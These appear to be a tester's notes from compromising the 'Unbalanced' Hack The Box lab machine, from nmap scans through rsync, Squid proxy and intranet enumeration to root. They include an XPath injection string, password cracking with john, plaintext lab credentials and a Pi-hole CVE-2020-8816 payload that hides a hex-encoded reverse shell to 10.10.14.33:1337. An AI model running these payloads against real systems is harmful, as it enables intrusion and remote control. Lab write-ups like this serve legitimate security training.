Nmap done: 1 IP address (1 host up) scanned in 26.77 seconds
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 10:06 EDT
Nmap scan report for unbalanced.htb (10.10.10.200)
Host is up (0.063s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 a2:76:5c:b0:88:6f:9e:62:e8:83:51:e7:cf:bf:2d:f2 (RSA)
|   256 d0:65:fb:f6:3e:11:b1:d6:e6:f7:5e:c0:15:0c:0a:77 (ECDSA)
|_  256 5e:2b:93:59:1d:49:28:8d:43:2c:c1:f7:e3:37:0f:83 (ED25519)
873/tcp  open  rsync      (protocol version 31)
3128/tcp open  http-proxy Squid http proxy 4.6
|_http-server-header: squid/4.6
|_http-title: ERROR: The requested URL could not be retrieved
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.29 seconds

################################################################################
FOOTHOLD
################################################################################

3128/tcp open  http-proxy Squid http proxy 4.6
|_http-server-header: squid/4.6
|_http-title: ERROR: The requested URL could not be retrieved
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

X - nc -vv unbalanced.htb 3128

rsync exposed, see whats on the port:
  -https://blog.rapid7.com/2018/12/21/rsunk-your-battleship-an-ocean-of-data-exposed-through-rsync/ 
    O - rsync rsync://unbalanced.htb:873 
    O - rsync rsync://unbalanced.htb:873/conf_backups
    O - rsync rsync://unbalanced.htb:873/conf_backups/.encfs6.xml

syntax to dl: https://book.hacktricks.xyz/pentesting/873-pentesting-rsync
    O - ssync -av rsync://unbalanced.htb:873/conf_backups/.encfs6.xml encfs6.xml
    O - ssync -av rsync://unbalanced.htb:873/conf_backups ./conf_backups

decryt: https://security.stackexchange.com/questions/98205/breaking-encfs-given-encfs6-xml
  -sudo apt-get install encfs
  -p3 JohnTheRipper/run/encfs2john.py ~/snack/unbalanced/conf_backups > ~/snack/unbalanced/encfs6.xml.john
  -john --wordlist=/home/kali/wordlists/rockyou.txt --pot=./cracked.pot encfs6.xml.john
  -john got bubblegum
  - squid.conf:
    - acl intranet dstdomain -n intranet.unbalanced.htb
    X - acl intranet_net dst -n 172.16.0.0/12
        X - try iterate over this ip range sploit0.py
    - http_access allow intranet
    - http_access allow intranet_net
    X - CONNECT method is allowed: acl CONNECT method CONNECT: use burp
      - try the opn ports:
          acl SSL_ports port 443
          acl Safe_ports port 80    # http
          acl Safe_ports port 21    # ftp
          acl Safe_ports port 443   # https
          acl Safe_ports port 70    # gopher
          acl Safe_ports port 210   # wais
          acl Safe_ports port 1025-65535  # unregistered ports
          acl Safe_ports port 280   # http-mgmt
          acl Safe_ports port 488   # gss-http
          acl Safe_ports port 591   # filemaker
          acl Safe_ports port 777   # multiling http
    O - intranet.unbalanced.htb while setting ff proxy to hit unbalanced.htb:3128
        - bingo! login page...
          X - ffuf -x http://unbalanced.htb:3128 -u http://intranet.unbalanced.htb/FUZZ -w ~/wordlists/raft-large-files.txt -fw 329
          X - ffuf -x http://unbalanced.htb:3128 -u http://intranet.unbalanced.htb/FUZZ -w ~/wordlists/raft-large-directories.txt -fw 329
        - manager:Thah$Sh1
    O - http://172.31.179.1/intranet.php  <---------- THE GOLDEN IP out of the huge cidr that has xpath injection flaw
        - ' or substring((//user[position()=1]/child::node()[position()=2]),1,1)="a" or ''='
        - sploit1.py:
            rita
            Rita Fubelli
            password01!
            rita@unbalanced.htb
            Role: HR Manager

            jim
            Jim Mickelson
            stairwaytoheaven
            jim@unbalanced.htb
            Role: Web Designer

            bryan <----------------------------------------------BINGO!
            Bryan Angstrom
            ireallyl0vebubblegum!!!
            bryan@unbalanced.htb
            Role: System Administrator

            sarah
            Sarah Goodman
            sarah4evah
            sarah@unbalanced.htb
            Role: Team Leader

################################################################################
ROOT
################################################################################
############
# Intranet #
############
* Install new intranet-host3 docker [DONE]
* Rewrite the intranet-host3 code to fix Xpath vulnerability [DONE]
* Test intranet-host3 [DONE]
* Add intranet-host3 to load balancer [DONE]
* Take down intranet-host1 and intranet-host2 from load balancer (set as quiescent, weight zero) [DONE]
* Fix intranet-host2 [DONE]
* Re-add intranet-host2 to load balancer (set default weight) [DONE]
- Fix intranet-host1 [TODO]
- Re-add intranet-host1 to load balancer (set default weight) [TODO]

###########
# Pi-hole #
###########
* Install Pi-hole docker (only listening on 127.0.0.1) [DONE]
* Set temporary admin password [DONE]
* Create Pi-hole configuration script [IN PROGRESS]
- Run Pi-hole configuration script [TODO]
- Expose Pi-hole ports to the network [TODO]

/etc/hosts has a hint to a disabled IP... its not disabled though?:
  172.17.0.1      intranet.unbalanced.htb
  #172.31.179.1   intranet-host1.unbalanced.htb   # temporarily disabled
  172.31.179.2    intranet-host2.unbalanced.htb
  172.31.179.3    intranet-host3.unbalanced.htb
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
    link/ether 02:42:c4:ac:58:2d brd ff:ff:ff:ff:ff:ff                                         
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0                                 
       valid_lft forever preferred_lft forever                                                 
LISTEN    0         128              127.0.0.1:5553             0.0.0.0:*        
LISTEN    0         32                 0.0.0.0:53               0.0.0.0:*        
LISTEN    0         128                0.0.0.0:22               0.0.0.0:*        
LISTEN    0         5                  0.0.0.0:873              0.0.0.0:*        
LISTEN    0         128              127.0.0.1:8080             0.0.0.0:*        
LISTEN    0         32                    [::]:53                  [::]:*        
LISTEN    0         128                   [::]:22                  [::]:*        
LISTEN    0         128                      *:3128                   *:*        
LISTEN    0         5                     [::]:873                 [::]:*        
                                                                                 
                                                                                 
[-] Listening UDP:                                                               
State     Recv-Q    Send-Q       Local Address:Port        Peer Address:Port     
UNCONN    0         0                  0.0.0.0:53               0.0.0.0:*        
UNCONN    0         0                  0.0.0.0:47262            0.0.0.0:*        
UNCONN    0         0                127.0.0.1:5553             0.0.0.0:*        
UNCONN    0         0                     [::]:53                  [::]:*        
UNCONN    0         0                        *:36965                  *:*        

reverse tunnel
  O - ssh -L 9999:localhost:8080: bryan@unbalanced.htb
  O - admin:admin works :)
  O - https://natedotred.wordpress.com/2020/03/28/cve-2020-8816-pi-hole-remote-code-execution/
  O - aaaaaaaaaaaa&&W=${PATH#/???/}&&P=${W%%?????:*}&&X=${PATH#/???/??}&&H=${X%%???:*}&&Z=${PATH#*:/??}&&R=${Z%%/*}&&$P$H$P$IFS-$R$IFS'EXEC(HEX2BIN("706870202d72202724736f636b3d66736f636b6f70656e282231302e31302e31342e3333222c31333337293b6578656328222f62696e2f7368202d69203c2633203e263320323e263322293b27"));' 
  O - python -c 'import pty; pty.spawn("/bin/bash")'
  X - Can use sudo?

  # Set web admin interface password
  /usr/local/bin/pihole -a -p 'bUbBl3gUm$43v3Ry0n3!'
  # Set admin email
  /usr/local/bin/pihole -a email admin@unbalanced.htb
  pihole.unbalanced.htb
  su root with the pass
    - bUbBl3gUm$43v3Ry0n3!
